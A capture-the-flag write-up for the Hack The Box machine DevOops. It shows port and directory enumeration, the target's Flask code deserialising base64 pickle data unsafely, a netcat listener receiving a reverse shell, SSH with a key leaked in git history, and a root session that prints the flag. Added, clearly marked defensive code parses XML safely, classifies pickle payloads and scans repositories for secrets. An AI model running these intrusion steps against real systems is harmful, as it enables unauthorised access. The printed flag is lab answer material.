```text
# Nmap 7.80 scan initiated Tue Mar 24 09:04:48 2020 as: nmap -sC -sV -oN ippsec_scan.txt 10.10.10.91
Nmap scan report for 10.10.10.91
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
|   256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
|_  256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
5000/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 24 09:05:52 2020 -- 1 IP address (1 host up) scanned in 64.19 seconds
```
Port 5000 runs a Python web application served by gunicorn. Enumerate its directories with dirsearch and wfuzz:
```text
$ wfuzz --hc=404 -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.91:5000/FUZZ
...
000000126:   200        1815 L    24122 W    517022 Ch   "feed"
000000366:   200        0 L       39 W       347 Ch      "upload"
000019602:   405        4 L       23 W       178 Ch      "newpost"
```
Getting User Flag
Visit the homepage:
```html
<html>
<body>
Under construction!<br>
<p>
This is feed.py, which will become the MVP for Blogfeeder application.
</p>
<p>
TODO: replace this with the proper feed from the dev.solita.fi backend.
</p>
<p>
<img src="/feed" align="center" width="60%" height="60%">
</p>
</body>
</html>
```
Visit http://10.10.10.91:5000/upload. The page expects an XML file containing Author, Subject and Content elements. Try uploading a normal XML file first.
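For contrast with an upload endpoint that trusts whatever XML it receives, the following is an added example (not the box's feed.py and not from the writeup) of how the Author/Subject/Content post format could be parsed defensively: the document is size-capped, any DOCTYPE or ENTITY declaration is refused before the parser sees it, and the element set is validated rather than trusted. The size limit and the `is_accepted` helper are assumptions of this example.

```python
# Added example: a defensive parser for the Author/Subject/Content XML post
# format expected by /upload. Not code from the target application.
import re
import xml.etree.ElementTree as ET

REQUIRED = ("Author", "Subject", "Content")
MAX_BYTES = 64 * 1024  # assumed policy limit, not a value from the page

# Any DOCTYPE (and therefore any <!ENTITY ...>) is rejected before parsing,
# so neither external entities nor entity expansion can reach the parser.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def parse_post_xml(data: bytes) -> dict:
    """Return {'Author': ..., 'Subject': ..., 'Content': ...} or raise ValueError."""
    if len(data) > MAX_BYTES:
        raise ValueError("document too large")
    if DOCTYPE_RE.search(data):
        raise ValueError("DOCTYPE/ENTITY declarations are not allowed")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc

    post = {}
    for name in REQUIRED:
        node = root.find(name)
        if node is None or node.text is None or not node.text.strip():
            raise ValueError(f"missing element: {name}")
        post[name] = node.text.strip()

    # Reject anything beyond the three expected child elements.
    extra = {child.tag for child in root} - set(REQUIRED)
    if extra:
        raise ValueError(f"unexpected elements: {sorted(extra)}")
    return post


def is_accepted(data: bytes) -> bool:
    """Convenience wrapper: True if the document passes validation."""
    try:
        parse_post_xml(data)
        return True
    except ValueError:
        return False


# Constructed sample inputs; nothing here was captured from the target.
GOOD = (b"<post><Author>roosa</Author><Subject>hello</Subject>"
        b"<Content>first post</Content></post>")
# A harmless internal entity is enough to trip the DOCTYPE check.
HAS_DOCTYPE = (b"<!DOCTYPE post [<!ENTITY x \"y\">]>"
               b"<post><Author>&x;</Author><Subject>s</Subject><Content>c</Content></post>")
EXTRA_ELEMENT = (b"<post><Author>a</Author><Subject>s</Subject>"
                 b"<Content>c</Content><Admin>1</Admin></post>")

if __name__ == "__main__":
    print(parse_post_xml(GOOD))
    for sample in (HAS_DOCTYPE, EXTRA_ELEMENT):
        print("accepted" if is_accepted(sample) else "rejected")
```

The string-level DOCTYPE check runs before parsing on purpose: it does not depend on which parser features are enabled, and it is easy to mirror as a log or WAF rule on the same endpoint.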
The relevant part of feed.py:

```python
@app.route("/newpost", methods=["POST"])
def newpost():
    # TODO: proper save to database, this is for testing purposes right now
    picklestr = base64.urlsafe_b64decode(request.data)
    # return picklestr
    postObj = pickle.loads(picklestr)
    return "POST RECEIVED: " + postObj['Subject']

## TODO: VERY important! DISABLED THIS IN PRODUCTION
#app = DebuggedApplication(app, evalex=True, console_path='/debugconsole')
# TODO: Replace run-gunicorn.sh with real Linux service script
#app = DebuggedApplication(app, evalex=True, console_path='/debugconsole')

if __name__ == "__main__":
    app.run(host='0.0.0,0', Debug=True)
```
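The `/newpost` handler above hands a client-controlled, base64-decoded body straight to `pickle.loads`, which will import and call whatever objects the pickle names. As an added example (not the target's code and not from the writeup), the block below shows the two things a defender wants here: a replacement handler that only accepts a JSON object with exactly the three post fields, and a classifier that inspects a request body with `pickletools.genops`, without executing it, so that log review or a WAF rule can distinguish JSON posts from pickle payloads and from pickles that carry code-invoking opcodes. The function names, the field length limit and the sample bodies are assumptions of this example.

```python
# Added example: hardened replacement for /newpost plus a non-executing
# payload classifier. Not code from the target's feed.py.
import base64
import binascii
import datetime
import io
import json
import pickle  # used only to build the constructed sample bodies below
import pickletools

REQUIRED = ("Author", "Subject", "Content")

# Opcodes that let a pickle import or call arbitrary objects when loaded.
CODE_EXEC_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                     "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def decode_body(body: bytes) -> bytes:
    """Decode the urlsafe-base64 body format the original handler expects."""
    try:
        return base64.urlsafe_b64decode(body)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("body is not valid base64") from exc


def classify_payload(raw: bytes) -> str:
    """Return 'json', 'pickle', 'pickle-code' or 'unknown' without executing anything."""
    try:
        json.loads(raw.decode("utf-8"))
        return "json"
    except (UnicodeDecodeError, json.JSONDecodeError):
        pass
    try:
        # genops disassembles the opcode stream; it never unpickles.
        ops = [op.name for op, _arg, _pos in pickletools.genops(io.BytesIO(raw))]
    except Exception:
        return "unknown"
    if ops and ops[-1] == "STOP":
        return "pickle-code" if CODE_EXEC_OPCODES.intersection(ops) else "pickle"
    return "unknown"


def load_post(body: bytes) -> dict:
    """Hardened loader: JSON only, exactly the three fields, short string values."""
    raw = decode_body(body)
    kind = classify_payload(raw)
    if kind != "json":
        raise ValueError(f"rejected {kind} payload")
    obj = json.loads(raw)
    if not isinstance(obj, dict) or set(obj) != set(REQUIRED):
        raise ValueError("post must contain exactly Author, Subject, Content")
    if not all(isinstance(v, str) and len(v) <= 4096 for v in obj.values()):
        raise ValueError("post fields must be strings of at most 4096 characters")
    return obj


def newpost_response(body: bytes) -> str:
    """Same visible behaviour as the original handler, with pickle removed."""
    return "POST RECEIVED: " + load_post(body)["Subject"]


def is_accepted(body: bytes) -> bool:
    try:
        load_post(body)
        return True
    except ValueError:
        return False


# Constructed sample bodies; none of these were captured from the target.
JSON_BODY = base64.urlsafe_b64encode(json.dumps(
    {"Author": "roosa", "Subject": "hello", "Content": "first post"}).encode())
PLAIN_PICKLE_BODY = base64.urlsafe_b64encode(pickle.dumps({"Subject": "hello"}))
# A harmless date object: its pickle still carries STACK_GLOBAL/REDUCE, the
# opcode shape that makes pickle import and call code on load.
OBJECT_PICKLE_BODY = base64.urlsafe_b64encode(
    pickle.dumps(datetime.date(2020, 3, 24)))

if __name__ == "__main__":
    for name, body in (("json", JSON_BODY), ("plain pickle", PLAIN_PICKLE_BODY),
                       ("object pickle", OBJECT_PICKLE_BODY)):
        print(name, "->", classify_payload(decode_body(body)),
              "accepted" if is_accepted(body) else "rejected")
```

Classifying before rejecting is deliberate: the handler refuses every non-JSON body either way, but recording `pickle` versus `pickle-code` in the application log gives the responder a cheap signal for which requests were probing the endpoint.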
```text
$ nc -lvvp 9000
listening on [any] 9000 ...
10.10.10.91: inverse host lookup failed: Unknown host
connect to [10.10.16.99] from (UNKNOWN) [10.10.10.91] 44014
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
$ python -c "import pty;pty.spawn('/bin/bash')"
roosa@gitter:~/deploy/src$ id
id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
roosa@gitter:~/deploy/src$ cd && ls -a user.txt
cd && ls -a user.txt
user.txt
```
```text
# kali @ kali in ~/HackTheBox/DevOops [2:01:04]
$ chmod 600 id_rsa

# kali @ kali in ~/HackTheBox/DevOops [2:01:19]
$ ssh -i id_rsa roosa@10.10.10.91
The authenticity of host '10.10.10.91 (10.10.10.91)' can't be established.
ECDSA key fingerprint is SHA256:hbD2D4PdnIVpAFHV8sSAbtM0IlTAIpYZ/nwspIdp4Vg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.91' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

135 packages can be updated.
60 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

roosa@gitter:~$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
```
```text
roosa@gitter:~/work/blogfeed$ git log --pretty=oneline
7ff507d029021b0915235ff91e6a74ba33009c6d Use Base64 for pickle feed loading
26ae6c8668995b2f09bf9e2809c36b156207bfa8 Set PIN to make debugging faster as it will no longer change every time the application code is changed. Remember to remove before production use.
cec54d8cb6117fd7f164db142f0348a74d3e9a70 Debug support added to make development more agile.
ca3e768f2434511e75bd5137593895bd38e1b1c2 Blogfeed app, initial version.
dfebfdfd9146c98432d19e3f7d83cc5f3adbfe94 Gunicorn startup script
33e87c312c08735a02fa9c796021a4a3023129ad reverted accidental commit with proper key
d387abf63e05c9628a59195cec9311751bdb283f add key for feed integration from tnerprise backend
1422e5a04d1b52a44e6dc81023420347e257ee5f Initial commit
```
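The history above shows the pattern that secret scanning exists to catch: a key is committed, then "reverted" in a later commit, but the original blob stays reachable in every clone. As an added example (not from the writeup or the target), the scanner below walks `git log -p --all` and reports every added line carrying a private-key header together with the commit and path it came from; `scan_patch_text` is pure so it can be run over any patch text, and the sample patch, its commit hashes and its file path are constructed placeholders rather than values from the page.

```python
# Added example: report private keys committed anywhere in a repository's
# history. Not part of the writeup or of the target. The git invocation in
# scan_repo() assumes a normal working clone; scan_patch_text() is pure.
import re
import subprocess

# PEM headers for the common private-key formats.
KEY_MARKERS = re.compile(
    r"-----BEGIN (?:RSA |DSA |EC |OPENSSH |PGP )?PRIVATE KEY(?: BLOCK)?-----")
COMMIT_RE = re.compile(r"^commit ([0-9a-f]{40})")
FILE_RE = re.compile(r"^\+\+\+ b/(.*)$")


def scan_patch_text(patch: str) -> list:
    """Return [(commit, path, patch_line_no)] for added lines with a key header.

    Removed lines ('-') are ignored: a key that was later deleted still shows
    up through the commit that added it, which is the one that matters.
    """
    hits = []
    commit = path = None
    for n, line in enumerate(patch.splitlines(), 1):
        m = COMMIT_RE.match(line)
        if m:
            commit, path = m.group(1), None
            continue
        m = FILE_RE.match(line)
        if m:
            path = m.group(1)
            continue
        if line.startswith("+") and not line.startswith("+++") \
                and KEY_MARKERS.search(line):
            hits.append((commit, path, n))
    return hits


def scan_repo(repo_dir: str) -> list:
    """Scan every commit reachable from any ref in repo_dir."""
    out = subprocess.run(
        ["git", "-C", repo_dir, "log", "-p", "--all", "--no-color"],
        check=True, capture_output=True, text=True).stdout
    return scan_patch_text(out)


# Constructed sample patch: placeholder hashes, path and key lines.
C1, C2 = "a" * 40, "b" * 40
SAMPLE_PATH = "integration/feed_backend.key"
SAMPLE_PATCH = f"""commit {C1}
Author: dev <dev@example.invalid>

    add key for feed integration

diff --git a/{SAMPLE_PATH} b/{SAMPLE_PATH}
--- /dev/null
+++ b/{SAMPLE_PATH}
@@ -0,0 +1,3 @@
+-----BEGIN RSA PRIVATE KEY-----
+PLACEHOLDERBASE64LINE
+-----END RSA PRIVATE KEY-----
commit {C2}
Author: dev <dev@example.invalid>

    reverted accidental commit with proper key

diff --git a/{SAMPLE_PATH} b/{SAMPLE_PATH}
--- a/{SAMPLE_PATH}
+++ b/{SAMPLE_PATH}
@@ -1,3 +1,3 @@
------BEGIN RSA PRIVATE KEY-----
-PLACEHOLDERBASE64LINE
+-----BEGIN RSA PRIVATE KEY-----
+OTHERPLACEHOLDERLINE
 -----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for commit, path, line_no in scan_patch_text(SAMPLE_PATCH):
        print(f"{commit[:12]} {path} (patch line {line_no})")
```

Run against the constructed patch, the scanner reports both commits: the one that added the first key and the "revert" that replaced it with another, which is exactly why a revert does not undo a leaked key and the credential itself has to be rotated.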
```text
135 packages can be updated.
60 updates are security updates.

Last login: Mon Mar 26 06:23:48 2018 from 192.168.57.1
root@gitter:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gitter:~# cat root.txt
d4fe1e7f7187407eebdd3209cb1ac7b3
```